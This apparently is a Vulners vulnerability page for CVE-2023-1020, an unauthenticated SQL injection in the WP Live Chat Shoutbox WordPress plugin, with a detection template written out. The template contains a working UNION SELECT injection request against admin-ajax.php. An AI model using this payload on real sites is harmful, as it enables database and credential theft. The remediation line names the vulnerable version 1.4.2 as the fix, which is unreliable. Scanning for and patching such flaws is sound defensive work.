| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| The vulnerability of the WP Live Chat Shoutbox plugin of the WordPress content management system allows a hacker to execute arbitrary SQL code. | 25 Oct 202300:00 | – | bdu_fstec | |
| CVE-2023-1020 | 24 Apr 202322:19 | – | circl | |
| WordPress plugin Steveas WP Live Chat Shoutbox SQL注入漏洞 | 24 Apr 202300:00 | – | cnnvd | |
| CVE-2023-1020 | 24 Apr 202318:30 | – | cve | |
| CVE-2023-1020 Steveas WP Live Chat Shoutbox <= 1.4.2 - Unauthenticated SQLi | 24 Apr 202318:30 | – | cvelist | |
| CVE-2023-1020 | 24 Apr 202319:15 | – | nvd | |
| CVE-2023-1020 | 24 Apr 202319:15 | – | osv | |
| WordPress Steveas WP Live Chat Shoutbox Plugin <= 1.4.2 is vulnerable to SQL Injection | 12 Apr 202300:00 | – | patchstack | |
| Sql injection | 24 Apr 202319:15 | – | prion | |
| PT-2023-6377 · WordPress · Steveas Wp Live Chat Shoutbox | 24 Apr 202300:00 | – | ptsecurity |
id: CVE-2023-1020
info:
name: Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
impact: |
Unauthenticated attackers can execute SQL injection through AJAX actions to extract the complete WordPress database including chat logs and user credentials.
remediation: |
Update to the latest version of the Steveas WP Live Chat Shoutbox plugin (1.4.2) or apply the vendor-provided patch to fix the SQL Injection vulnerability.
reference:
- https://wpscan.com/vulnerability/4e5aa9a3-65a0-47d6-bc26-a2fb6cb073ff
- https://wordpress.org/plugins/wp-shoutbox-live-chat/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1020
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-1020
cwe-id: CWE-89
epss-score: 0.0499
epss-percentile: 0.91175
cpe: cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: wp_live_chat_shoutbox_project
product: wp_live_chat_shoutbox
framework: wordpress
tags: cve2023,cve,wpscan,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,wp_live_chat_shoutbox_project,vkev,vuln
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default
matchers-condition: and
matchers:
- type: word
part: body
words:
- "c8c605999f3d8352d7bb792cf3fdb25b"
- "no_participation"
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4b0a00483046022100e4beed1913917a0108518ccdd9c26b293a258858ccee2b5232ae43a1cc3731ea022100f801b37c50af031f9b2c81329aa0895de9e043912f23d89b21c2813ac45b5f3e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation